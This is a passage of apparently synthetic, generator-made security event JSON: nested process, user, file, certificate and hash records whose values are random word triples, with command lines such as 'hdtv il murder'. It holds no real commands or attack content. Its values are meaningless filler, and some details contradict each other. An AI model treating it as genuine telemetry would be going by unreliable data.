{\"name\": \"Journal\", \"type\": \"System\", \"domain\": \"tuition gst cheese\", \"uid\": \"2909b99e-a0cf-11ef-946c-0242ac110007\", \"groups\": [{\"name\": \"overview friendly ul\", \"desc\": \"spent richards molecular\", \"privileges\": [\"gale suicide combo\"]}], \"type_id\": 3, \"full_name\": \"Lynsey Sherise\"}, \"uid\": \"2909c8d0-a0cf-11ef-82af-0242ac110007\", \"cmd_line\": \"hdtv il murder\", \"created_time\": 1731399707895, \"parent_process\": {\"name\": \"Indoor\", \"pid\": 29, \"session\": {\"terminal\": \"eternal armor maternity\", \"uid\": \"290a04bc-a0cf-11ef-9799-0242ac110007\", \"uuid\": \"290a0af2-a0cf-11ef-8713-0242ac110007\", \"issuer\": \"troubleshooting footage pour\", \"created_time\": 1731399707897}, \"file\": {\"attributes\": 81, \"name\": \"submitted.cpp\", \"owner\": {\"name\": \"Reverse\", \"type\": \"Unknown\", \"domain\": \"wiki ba evaluating\", \"uid\": \"290a2bea-a0cf-11ef-a2af-0242ac110007\", \"type_id\": 0, \"email_addr\": 
\"Bessie@outcomes.pro\", \"risk_level\": \"plenty sarah preparation\"}, \"size\": 2618568753, \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"annually chapters country/separately.pdf/submitted.cpp\", \"modifier\": {\"name\": \"Appraisal\", \"type\": \"Admin\", \"uid\": \"290a3a2c-a0cf-11ef-96ea-0242ac110007\", \"type_id\": 2}, \"desc\": \"deeply dresses hills\", \"ext\": \"scholarships fundraising hydrocodone\", \"type_id\": 5, \"company_name\": \"Galen Nakita\", \"parent_folder\": \"annually chapters country/separately.pdf\", \"accessed_time\": 1731399707898, \"hashes\": [{\"value\": \"9E2FB759708B9621D802CC03D5DA0C1600A80AE7A740A0840F232C31B6E61F01EE5CF00A1719E67BEC538182D8A3074DA5123670601506065A44D4E8AC2C4CB2\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"user\": {\"name\": \"Asian\", \"type\": \"Unknown\", \"uid\": \"290a520a-a0cf-11ef-a44f-0242ac110007\", \"type_id\": 0, \"full_name\": \"Roland Nichol\", \"account\": {\"name\": \"girl sugar benefit\", \"type\": \"Azure AD Account\", \"uid\": \"290a5ef8-a0cf-11ef-809f-0242ac110007\", \"labels\": [\"complex\"], \"type_id\": 6}, \"credential_uid\": \"290a66e6-a0cf-11ef-a28e-0242ac110007\", \"uid_alt\": \"transportation vegetables debian\"}, \"uid\": \"290a756e-a0cf-11ef-86a9-0242ac110007\", \"cmd_line\": \"bull retailers sensitivity\", \"created_time\": 1731399707900, \"lineage\": [\"george herein ghz\"], \"parent_process\": {\"name\": \"Broader\", \"pid\": 50, \"file\": {\"name\": \"vegetation.tif\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"leonard accent told/determine.sdf/vegetation.tif\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"traffic changes calm\", \"issuer\": \"give img nsw\", \"fingerprints\": [{\"value\": \"7245C357B5BE2E81CFA6582A9CEF4108E8E9BC9E4DA47D108C495262F1EE943BB741CFFE5FDDEE5B3AD441498918E714FF20108B4CDDEDE100B8AD003E7DDA73\", \"algorithm\": \"quickXorHash\", 
\"algorithm_id\": 7}], \"created_time\": 1731399707900, \"serial_number\": \"blades mike seal\"}, \"algorithm\": \"Authenticode\", \"algorithm_id\": 4}, \"desc\": \"electronics charges gallery\", \"ext\": \"disorder agriculture anger\", \"type_id\": 1, \"company_name\": \"Billie Shawnee\", \"mime_type\": \"briefly/entirely\", \"parent_folder\": \"leonard accent told/determine.sdf\", \"created_time\": 1731399707900, \"hashes\": [{\"value\": \"0947FCC917EB1D3C89AD818BEB61E3B2C3CF3BBA\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"CEE604715F44D7CD732D46B9B349EC7911E55D19C6E598E8064B403337EB8F9EA9E58A34D42BA046D72E529215E7D8E2AB68DA5552324343DA54BF3220615F0A\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"modified_time\": 1731399707900}, \"user\": {\"name\": \"Markers\", \"type\": \"Unknown\", \"uid\": \"290a9f62-a0cf-11ef-b0c9-0242ac110007\", \"groups\": [{\"name\": \"foul administrative owns\", \"uid\": \"290aaa98-a0cf-11ef-a3a1-0242ac110007\"}, {\"name\": \"develop houston gamma\", \"uid\": \"290ab498-a0cf-11ef-80bd-0242ac110007\", \"privileges\": [\"shade bell link\", \"processor code ashley\"]}], \"type_id\": 0, \"account\": {\"type\": \"AWS Account\", \"uid\": \"290abf42-a0cf-11ef-a831-0242ac110007\", \"type_id\": 10}}, \"uid\": \"290ac5dc-a0cf-11ef-a78c-0242ac110007\", \"cmd_line\": \"studies un checking\", \"created_time\": 1731399707902, \"integrity\": \"Unknown\", \"integrity_id\": 0, \"lineage\": [\"commodity config charges\", \"wikipedia las relatives\"], \"parent_process\": {\"name\": \"Eyed\", \"pid\": 59, \"user\": {\"name\": \"Louisiana\", \"type\": \"System\", \"uid\": \"290b1514-a0cf-11ef-9bd3-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"290b1cbc-a0cf-11ef-8f91-0242ac110007\", \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"uid\": \"290b241e-a0cf-11ef-89bc-0242ac110007\", \"cmd_line\": \"skins shipments proteins\", \"created_time\": 1731399707904, \"parent_process\": {\"name\": \"Almost\", \"pid\": 53, \"user\": 
{\"name\": \"Subscription\", \"type\": \"User\", \"domain\": \"lion aims yukon\", \"uid\": \"290b388c-a0cf-11ef-81e2-0242ac110007\", \"type_id\": 1}, \"uid\": \"290b3f44-a0cf-11ef-856f-0242ac110007\", \"cmd_line\": \"bidding lauren confusion\", \"created_time\": 1731399707905, \"parent_process\": {\"name\": \"Word\", \"pid\": 11, \"session\": {\"count\": 9, \"issuer\": \"practice attempt court\", \"created_time\": 1731399707905, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"attributes\": 44, \"name\": \"consistency.sln\", \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"handbags camera urgent/forecast.gz/consistency.sln\", \"ext\": \"entity fe blocking\", \"type_id\": 3, \"parent_folder\": \"handbags camera urgent/forecast.gz\", \"hashes\": [{\"value\": \"6D17DA8FAF5A7C8BD04AFB00506B03897D0DE6A8D7B4EBD644B680ACB98A1CFE8924C0F11BCCA03BFC8D47BE350C1C8A20AF62D4E02D978CB8159FB2D49086A7\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"BE412112026B3DCAEC7BE421BA9D884A2FBC5C9795F336CCBD0E8C76BFF312AA3BAFBB4BA71F540A076F5C0D8189254B397357A086D5B86B7D794FDCE6FCCFC1\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"is_system\": true}, \"user\": {\"type\": \"Unknown\", \"uid\": \"290b69f6-a0cf-11ef-a847-0242ac110007\", \"type_id\": 0}, \"uid\": \"290b720c-a0cf-11ef-a98d-0242ac110007\", \"cmd_line\": \"fears demanding stewart\", \"created_time\": 1731399707906, \"integrity\": \"High\", \"integrity_id\": 4, \"parent_process\": {\"name\": \"Kinds\", \"pid\": 63, \"session\": {\"uid\": \"290b83d2-a0cf-11ef-9629-0242ac110007\", \"uuid\": \"290b89cc-a0cf-11ef-89ef-0242ac110007\", \"issuer\": \"tray lying x\", \"created_time\": 1731399707907, \"is_remote\": true}, \"file\": {\"name\": \"concerns.cab\", \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"faq payable progressive/part.m3u/concerns.cab\", \"ext\": \"imported supplements prepaid\", \"type_id\": 3, \"mime_type\": \"garmin/popularity\", \"parent_folder\": 
\"faq payable progressive/part.m3u\", \"hashes\": [{\"value\": \"E8A5CF21ECCC4DB4DAAFDD5BD0140861637D937597AD8EE0246E0715031FE6BDABB4F5B16FDDCACD9722B57A18B46453B01D984E3D55292FB82825C3A06E516A\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}, {\"value\": \"4B9E4636494461CF31094E9A16F456FE\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}]}, \"user\": {\"type\": \"remarkable\", \"type_id\": 99, \"full_name\": \"Jennell Sidney\", \"email_addr\": \"Clayton@scanned.travel\", \"ldap_person\": {\"location\": {\"desc\": \"Monaco, Principality of\", \"city\": \"Phil clarity\", \"country\": \"MC\", \"coordinates\": [113.7672, 53.7852], \"continent\": \"Europe\"}, \"given_name\": \"rachel trio electronics\", \"ldap_cn\": \"accessory fancy shelter\"}}, \"uid\": \"290babfa-a0cf-11ef-a1ee-0242ac110007\", \"cmd_line\": \"tuner clara concepts\", \"created_time\": 1731399707908, \"integrity\": \"boxes x day\", \"parent_process\": {\"name\": \"Animated\", \"pid\": 43, \"file\": {\"name\": \"pgp.rom\", \"type\": \"Symbolic Link\", \"path\": \"percent obtaining influenced/liked.bmp/pgp.rom\", \"signature\": {\"digest\": {\"value\": \"0A6CFE12D4BE13BD525E0097949ED52B4E032606B7BF98076581F2189F23342568BE12B631EF1F25F82E1979FC852ECA24E8A38B319B071638C3153E4DA60740\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, \"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290bcd06-a0cf-11ef-8f86-0242ac110007\", \"is_self_signed\": true, \"subject\": \"brilliant follow county\", \"issuer\": \"suppliers workout deposit\", \"fingerprints\": [{\"value\": \"03114C6B1064C1C04AE3C88FA18F582A2228B88A7786BBFCBCE275DED7A5C23A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": \"F07D26D3B025D5EF30B38458926092E990C3B6F0BE1A23B561D778E8467319E0444B2425FDEDB91121554B8641B06B3654426F63C9C0435C6487571DC9AE0FC5\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"created_time\": 1731399707908, \"expiration_time\": 1731399707909, \"serial_number\": \"hazard compaq emirates\"}, 
\"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707909}, \"type_id\": 7, \"accessor\": {\"name\": \"Athletes\", \"type\": \"System\", \"uid\": \"290bdfe4-a0cf-11ef-88a6-0242ac110007\", \"org\": {\"name\": \"publicity porsche shoulder\", \"uid\": \"290bebf6-a0cf-11ef-bcbf-0242ac110007\", \"ou_name\": \"wins separate lemon\"}, \"groups\": [{\"name\": \"jose quotes toolbar\", \"uid\": \"290c038e-a0cf-11ef-beec-0242ac110007\"}], \"type_id\": 3, \"email_addr\": \"Sherry@machinery.store\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"risk_score\": 25}, \"company_name\": \"Lashell Vincent\", \"mime_type\": \"representing/lee\", \"parent_folder\": \"percent obtaining influenced/liked.bmp\", \"hashes\": [{\"value\": \"E2F3E36EA43BA45AB3503CED0A944CD1A950065C\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"37DB034AE21206C4451CA1E72F6D031F77B7D0A27FF50009CFBECB868E7DE5C6\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"october surrey en\"}, \"uid\": \"290c11c6-a0cf-11ef-90cb-0242ac110007\", \"cmd_line\": \"wires wheels mf\", \"created_time\": 1731399707910, \"parent_process\": {\"name\": \"Petite\", \"pid\": 26, \"file\": {\"name\": \"difficulty.deskthemepack\", \"owner\": {\"name\": \"Costa\", \"type\": \"Unknown\", \"uid\": \"290c33c2-a0cf-11ef-87c6-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"manager\": {\"name\": \"Genetics\", \"type\": \"User\", \"domain\": \"gotta shades electron\", \"type_id\": 1, \"account\": {\"name\": \"hood consortium conversion\", \"type\": \"Windows Account\", \"uid\": \"290c4970-a0cf-11ef-8a6a-0242ac110007\", \"labels\": [\"dose\"], \"type_id\": 2}, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"created_time\": 1731399707912, \"job_title\": \"bestsellers exactly diffs\", \"leave_time\": 1731399707912, \"surname\": \"responded pasta killed\"}}, \"type\": \"Symbolic Link\", \"path\": \"dimensions achieving ordinary/painting.sys/difficulty.deskthemepack\", 
\"product\": {\"name\": \"implications pizza christmas\", \"version\": \"1.3.0\", \"uid\": \"290c597e-a0cf-11ef-b883-0242ac110007\", \"vendor_name\": \"amateur faith fell\"}, \"uid\": \"290c6086-a0cf-11ef-90f6-0242ac110007\", \"ext\": \"transexuales sas operate\", \"type_id\": 7, \"accessor\": {\"name\": \"Giants\", \"type\": \"System\", \"domain\": \"pressure girl facility\", \"uid\": \"290c722e-a0cf-11ef-b5e2-0242ac110007\", \"type_id\": 3, \"full_name\": \"Marcene Goldie\", \"risk_score\": 35}, \"parent_folder\": \"dimensions achieving ordinary/painting.sys\", \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"created_time\": 1731399707913, \"hashes\": [{\"value\": \"B7B6604452EAF6AB6947459B4FA35CDFDCA39605BF415F77DDD90B47B7AE74ACC2BD0AB274FFC18792A7B43A7EE661EA8098EA69E1D0483392690A4D0BFFA60D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"type\": \"eau\", \"domain\": \"meaning feedback jan\", \"uid\": \"290c8624-a0cf-11ef-97f7-0242ac110007\", \"type_id\": 99, \"credential_uid\": \"290c8e30-a0cf-11ef-9434-0242ac110007\"}, \"created_time\": 1731399707913, \"parent_process\": {\"name\": \"Yards\", \"pid\": 15, \"file\": {\"name\": \"williams.xhtml\", \"type\": \"Folder\", \"path\": \"thailand diameter love/rachel.java/williams.xhtml\", \"signature\": {\"state\": \"diffs seasons conflicts\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"ethernet suitable brandon\", \"issuer\": \"optimization earliest differently\", \"fingerprints\": [{\"value\": \"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"DEE5E5BE829C1FF9E773E27CDA4A8960CAB5C8A6F392DA6ACCBACB430B13B9BC64822221325357EAA87B60D5F4474090332CD89561EBEC061294834301DF9AE9\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 
1731399707914, \"expiration_time\": 1731399707914, \"serial_number\": \"photographer tax up\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2}, \"uid\": \"290cc5f8-a0cf-11ef-92a0-0242ac110007\", \"ext\": \"alien cafe barriers\", \"type_id\": 2, \"parent_folder\": \"thailand diameter love/rachel.java\", \"confidentiality\": \"Private\", \"confidentiality_id\": 5, \"hashes\": [{\"value\": \"2B831F21DC87C2B301C73A0ACE1A47E607F1C5210E766355BD25B4E47948BBB20B677EE6C92C70765B352A0CCC29C89AB8D8D3489DEE0CCD7EDE26C6BDF6508F\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"se diabetes vitamin\"}, \"user\": {\"name\": \"Caps\", \"type\": \"System\", \"uid\": \"290cd5ca-a0cf-11ef-80bf-0242ac110007\", \"type_id\": 3, \"full_name\": \"Eve Roger\", \"account\": {\"name\": \"clearing deviant confidential\", \"type\": \"Apple Account\", \"uid\": \"290ce038-a0cf-11ef-8ee9-0242ac110007\", \"type_id\": 8}, \"email_addr\": \"Renda@antivirus.int\", \"uid_alt\": \"forced jvc archives\"}, \"uid\": \"290ce786-a0cf-11ef-9fc4-0242ac110007\", \"cmd_line\": \"reuters revolution thermal\", \"created_time\": 1731399707916, \"lineage\": [\"settled household february\", \"countries implemented chinese\"], \"parent_process\": {\"name\": \"Unions\", \"pid\": 41, \"file\": {\"name\": \"groups.part\", \"size\": 2002602281, \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"alice gnome diploma/consent.tex/groups.part\", \"product\": {\"name\": \"useful yen synopsis\", \"version\": \"1.3.0\", \"uid\": \"290d29f8-a0cf-11ef-a1a1-0242ac110007\", \"feature\": {\"name\": \"spider victor principle\", \"version\": \"1.3.0\", \"uid\": \"290d3420-a0cf-11ef-bd6a-0242ac110007\"}, \"url_string\": \"disagree\", \"vendor_name\": \"ist covered rock\"}, \"uid\": \"290d3b32-a0cf-11ef-bdef-0242ac110007\", \"ext\": \"glory regards somewhere\", \"type_id\": 3, \"company_name\": \"Melida Rosina\", \"parent_folder\": \"alice gnome diploma/consent.tex\", \"accessed_time\": 
1731399707918, \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"hashes\": [{\"value\": \"A07C6F758C9EF024F836E2C0BD10FE9C43126081A22D73DD8040D8D179B10DEBE3BC9356500F5C7F0BA87256EFA37A673C190A0AC6F0BFC0529F9FC303878B00\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"isa action je\"}, \"user\": {\"name\": \"Messaging\", \"type\": \"System\", \"uid\": \"290d4c1c-a0cf-11ef-8059-0242ac110007\", \"type_id\": 3, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290d52b6-a0cf-11ef-9425-0242ac110007\", \"cmd_line\": \"rent seed gentleman\", \"created_time\": 1731399707918, \"lineage\": [\"pockets sponsor exactly\", \"disability syntax print\"], \"parent_process\": {\"name\": \"Corrections\", \"pid\": 10, \"file\": {\"name\": \"groove.xlsx\", \"owner\": {\"name\": \"February\", \"type\": \"User\", \"uid\": \"290d70de-a0cf-11ef-86d6-0242ac110007\", \"type_id\": 1, \"credential_uid\": \"290d775a-a0cf-11ef-afe6-0242ac110007\", \"email_addr\": \"Helena@songs.net\", \"risk_level\": \"High\", \"risk_level_id\": 3}, \"type\": \"Folder\", \"version\": \"1.3.0\", \"path\": \"announces contamination leisure/bits.kml/groove.xlsx\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290d9a32-a0cf-11ef-b46e-0242ac110007\", \"is_self_signed\": false, \"subject\": \"conferences kingdom charge\", \"issuer\": \"characterization relatively cas\", \"fingerprints\": [{\"value\": \"90F747EBF0E276407987570F6D39812AC53223E174E41CEDDD291A5F7136E3A6BEF9257C3C73FE3B92D5149E8E1C1BE08A61940CEB8AF03510E22E0492752C18\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"63C326C6244EB0474D3008256E1217754BD2B836E98C247D0A19A57BF2AB18C7FF3D6BF574DB7E31FED2EEC3DA9B7CB69EDDD8DC256FEB8D5E822F176D8444A9\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"created_time\": 1731399707920, \"expiration_time\": 1731399707920, \"serial_number\": \"seed stupid slide\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2, 
\"developer_uid\": \"290da806-a0cf-11ef-a0a5-0242ac110007\"}, \"ext\": \"retired penn graduated\", \"type_id\": 2, \"parent_folder\": \"announces contamination leisure/bits.kml\", \"hashes\": [{\"value\": \"2A7F70F5957828EEA5C62064B4EB2A32561EB5B3003D729F2605228F225A85EF528EF7666F79B2810432D7E39CB959670A2EA9B1EDEB258E107F47E68D114FEC\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707921}, \"user\": {\"name\": \"Diagram\", \"type\": \"System\", \"domain\": \"existing jun treasury\", \"uid\": \"290db904-a0cf-11ef-aa9a-0242ac110007\", \"org\": {\"name\": \"coding maria scenarios\", \"uid\": \"290dc340-a0cf-11ef-9323-0242ac110007\"}, \"type_id\": 3, \"risk_score\": 79}, \"uid\": \"290dca20-a0cf-11ef-b98e-0242ac110007\", \"cmd_line\": \"mechanical estimates again\", \"created_time\": 1731399707921, \"parent_process\": {\"name\": \"Tabs\", \"pid\": 55, \"session\": {\"uid\": \"290deae6-a0cf-11ef-b636-0242ac110007\", \"issuer\": \"rat employer stadium\", \"created_time\": 1731399707922, \"credential_uid\": \"290df4e6-a0cf-11ef-9290-0242ac110007\", \"expiration_time\": 1731399707922, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"name\": \"integral.cpl\", \"owner\": {\"type\": \"sphere\", \"domain\": \"entirely gale inc\", \"type_id\": 99, \"account\": {\"name\": \"suits kim intellectual\", \"type\": \"AWS IAM User\", \"uid\": \"290e0f3a-a0cf-11ef-92a9-0242ac110007\", \"type_id\": 3}, \"risk_level\": \"carpet diamond departure\", \"uid_alt\": \"meta spank counts\"}, \"size\": 3671310304, \"type\": \"Symbolic Link\", \"path\": \"normal holds match/terrible.iso/integral.cpl\", \"modifier\": {\"name\": \"Acids\", \"type\": \"typing\", \"type_id\": 99}, \"uid\": \"290e1bec-a0cf-11ef-a719-0242ac110007\", \"ext\": \"stated smooth principles\", \"type_id\": 7, \"company_name\": \"Jeremiah Sonny\", \"parent_folder\": \"normal holds match/terrible.iso\", \"hashes\": [{\"value\": 
\"C449C98FCC2EDC7FE87FAF3FEF6C9D3F5499ACDC3BAC774F19D7B447B333103DCFED31CCAC83F9EE9D1E9601282E92EDA75DAEA8140D8C7EB9220338803C8D6E\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}]}, \"user\": {\"name\": \"Reduce\", \"type\": \"Admin\", \"domain\": \"preceding expressions your\", \"uid\": \"290e30c8-a0cf-11ef-8f59-0242ac110007\", \"groups\": [{\"name\": \"struggle photoshop walking\", \"desc\": \"sleep quoted able\", \"uid\": \"290e3b2c-a0cf-11ef-b7cf-0242ac110007\"}, {\"name\": \"ethiopia evaluate lover\", \"desc\": \"partition sound composition\"}], \"type_id\": 2, \"full_name\": \"Marisha Wesley\", \"ldap_person\": {\"cost_center\": \"spank universal techniques\", \"deleted_time\": 1731399707924, \"ldap_cn\": \"sight tale town\", \"leave_time\": 1731399707924, \"modified_time\": 1731399707924}}, \"uid\": \"290e4748-a0cf-11ef-8355-0242ac110007\", \"cmd_line\": \"flower arrest reveal\", \"created_time\": 1731399707925, \"parent_process\": {\"name\": \"Dip\", \"pid\": 99, \"session\": {\"uid\": \"290e5cb0-a0cf-11ef-8142-0242ac110007\", \"uuid\": \"290e63f4-a0cf-11ef-942e-0242ac110007\", \"issuer\": \"spirits up oral\", \"expiration_time\": 1731399707925, \"is_mfa\": false, \"is_remote\": true}, \"file\": {\"name\": \"fantasy.m4v\", \"owner\": {\"name\": \"Worse\", \"type\": \"User\", \"uid\": \"290e7628-a0cf-11ef-8429-0242ac110007\", \"groups\": [{\"name\": \"pierce deutschland scout\", \"type\": \"sacred mongolia edt\", \"uid\": \"290e8712-a0cf-11ef-b60b-0242ac110007\"}], \"type_id\": 1, \"full_name\": \"Tomika Renato\"}, \"type\": \"Regular File\", \"path\": \"approaches malpractice basics/lifetime.dxf/fantasy.m4v\", \"desc\": \"loops charm mpegs\", \"ext\": \"pork picked investigations\", \"type_id\": 1, \"parent_folder\": \"approaches malpractice basics/lifetime.dxf\", \"accessed_time\": 1731399707926, \"confidentiality\": \"subjective\", \"confidentiality_id\": 99, \"hashes\": [{\"value\": \"DB1A6CE0E4C6F3924C7CCA74924F4B0EF8BC0031\", \"algorithm\": 
\"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"2B9A99087B9991B5EAD9406E2CAC8DA385815E6C3FA4DA96E1487782280E8E82FDBD3536F85994E271610D72C5A62E6F027E0CD37DA05806289882A1440BD441\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"xattributes\": {}}, \"user\": {\"name\": \"Expects\", \"type\": \"System\", \"domain\": \"blade keith manga\", \"uid\": \"290e9ba8-a0cf-11ef-9a18-0242ac110007\", \"type_id\": 3, \"account\": {\"name\": \"swedish ol flexible\", \"type\": \"GCP Account\", \"uid\": \"290ea6ca-a0cf-11ef-9b3b-0242ac110007\", \"type_id\": 5}, \"risk_level\": \"world feelings championships\"}, \"uid\": \"290eadbe-a0cf-11ef-9668-0242ac110007\", \"cmd_line\": \"iowa gear scheduling\", \"created_time\": 1731399707927, \"integrity\": \"Medium\", \"integrity_id\": 3, \"lineage\": [\"maximize associations reynolds\"], \"parent_process\": {\"name\": \"Themes\", \"pid\": 45, \"file\": {\"name\": \"designers.rpm\", \"type\": \"Named Pipe\", \"path\": \"votes year mice/fort.gpx/designers.rpm\", \"uid\": \"290edaaa-a0cf-11ef-aa5d-0242ac110007\", \"ext\": \"keyboards yet ask\", \"type_id\": 6, \"mime_type\": \"motorola/patrick\", \"parent_folder\": \"votes year mice/fort.gpx\", \"created_time\": 1731399707928, \"hashes\": [{\"value\": \"02FA8D46FB2AC65EE42912604250A146AF74C6B8CFF1ACD09BC5F460FB9850CAD2674F76F982ED052C78D178196ED4C10256E2BC50E191DBB82F625CAD071090\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"BA1DB3B5141AA0FBF3DD4F6839F49B0B88809121634B4BB39272A838924DDEA2E4D1EBDB9E5F8F8AD90243DBD2A7D2D5497D828BD12E5590FB27483AA1287CD3\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707928}, \"user\": {\"name\": \"Ongoing\", \"uid\": \"290ee9a0-a0cf-11ef-ac76-0242ac110007\", \"credential_uid\": \"290ef076-a0cf-11ef-adb8-0242ac110007\"}, \"tid\": 6, \"uid\": \"290ef99a-a0cf-11ef-a3ec-0242ac110007\", \"cmd_line\": \"correction weapon gaming\", \"created_time\": 1731399707929, \"parent_process\": {\"name\": 
\"Voyeurweb\", \"pid\": 45, \"file\": {\"name\": \"varied.php\", \"type\": \"Named Pipe\", \"path\": \"mba francis sony/tend.xml/varied.php\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": true, \"subject\": \"undo nickname stay\", \"issuer\": \"yugoslavia how precisely\", \"fingerprints\": [{\"value\": \"BD87A5FFC4117A0F11094CA6BA6A838013BE215959B7358980553B0360822DD67CACADAFA42D71AB48C4EA3EED5F2491D079661CEB0A7694FFA439EB7743CC04\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"4194D1706ED1F408D5E02D672777019F4D5385C766A8C6CA8ACBA3167D36A7B9\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"created_time\": 1731399707930, \"expiration_time\": 1731399707930, \"serial_number\": \"extraction cabin lions\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707930}, \"ext\": \"nicholas doing fraud\", \"type_id\": 6, \"mime_type\": \"nextel/himself\", \"parent_folder\": \"mba francis sony/tend.xml\", \"hashes\": [{\"value\": \"21EA6263C16406DFC344CF7CB2A129B97FD2ECF367C828208CBBEDA6599B989F6C2C3DCB1BDF581ABC97201CF64FFBC0D7415F00564F6D80A92C7FFE7037894C\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"7ED6BDBCCADC1CB9DFEA88CA33B6A9346EAE030FF7E9FADD4C23359C0EA7390D\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"islands interventions removable\", \"xattributes\": {}}, \"user\": {\"name\": \"Soldier\", \"type\": \"User\", \"uid\": \"290f2596-a0cf-11ef-8caf-0242ac110007\", \"type_id\": 1, \"account\": {\"name\": \"ford doug cigarette\", \"type\": \"Mac OS Account\", \"uid\": \"290f3090-a0cf-11ef-9ad3-0242ac110007\", \"type_id\": 7}}, \"uid\": \"290f36e4-a0cf-11ef-bdab-0242ac110007\", \"cmd_line\": \"generally alberta anthropology\", \"created_time\": 1731399707931, \"parent_process\": {\"name\": \"Spirits\", \"pid\": 86, \"file\": {\"name\": \"flights.flv\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"str inner 
working/pose.h/flights.flv\", \"ext\": \"general became bermuda\", \"type_id\": 1, \"parent_folder\": \"str inner working/pose.h\", \"hashes\": [{\"value\": \"DC684E0A948E820C9B32AE34F0E147CCCAEAB3646C95D1FBF6E5EA257B9107251945EB892CD81A3750D89799ADF86C76382C60E73A85B10D110CE39164882C8F\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"CCD823CAF8108F62C012B02D4C233DA76EACF9FDEA959B9DD909ADF1ECC01BD5F184FC7904184E5A6F296850D7102AAF79E8606629B877723DEC951A67E1B193\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707932}, \"uid\": \"290f6ac4-a0cf-11ef-bc5e-0242ac110007\", \"cmd_line\": \"sense terrorism hl\", \"created_time\": 1731399707932, \"parent_process\": {\"name\": \"Moving\", \"pid\": 43, \"file\": {\"attributes\": 25, \"name\": \"comparison.pages\", \"owner\": {\"name\": \"Infringement\", \"type\": \"User\", \"uid\": \"290f864e-a0cf-11ef-9828-0242ac110007\", \"groups\": [{\"name\": \"coordinate registration browse\", \"desc\": \"attorney ya walked\", \"uid\": \"290f974c-a0cf-11ef-a918-0242ac110007\"}], \"type_id\": 1, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 55, \"uid_alt\": \"licenses cir vacancies\"}, \"type\": \"Unknown\", \"path\": \"lows fc focusing/canvas.pptx/comparison.pages\", \"modifier\": {\"type\": \"User\", \"uid\": \"290fa3ea-a0cf-11ef-b1b2-0242ac110007\", \"groups\": [{\"name\": \"bedroom positions win\", \"desc\": \"amazon feof extras\", \"uid\": \"290fae44-a0cf-11ef-9db8-0242ac110007\"}, {\"name\": \"came swingers colon\", \"uid\": \"290fb646-a0cf-11ef-b3ed-0242ac110007\"}], \"type_id\": 1, \"ldap_person\": {\"employee_uid\": \"290fc050-a0cf-11ef-aac9-0242ac110007\", \"job_title\": \"constitutional ricky jonathan\", \"ldap_dn\": \"marketplace ranch counting\"}, \"risk_score\": 0, \"uid_alt\": \"riding indicate wiley\"}, \"ext\": \"specification cialis inherited\", \"type_id\": 0, 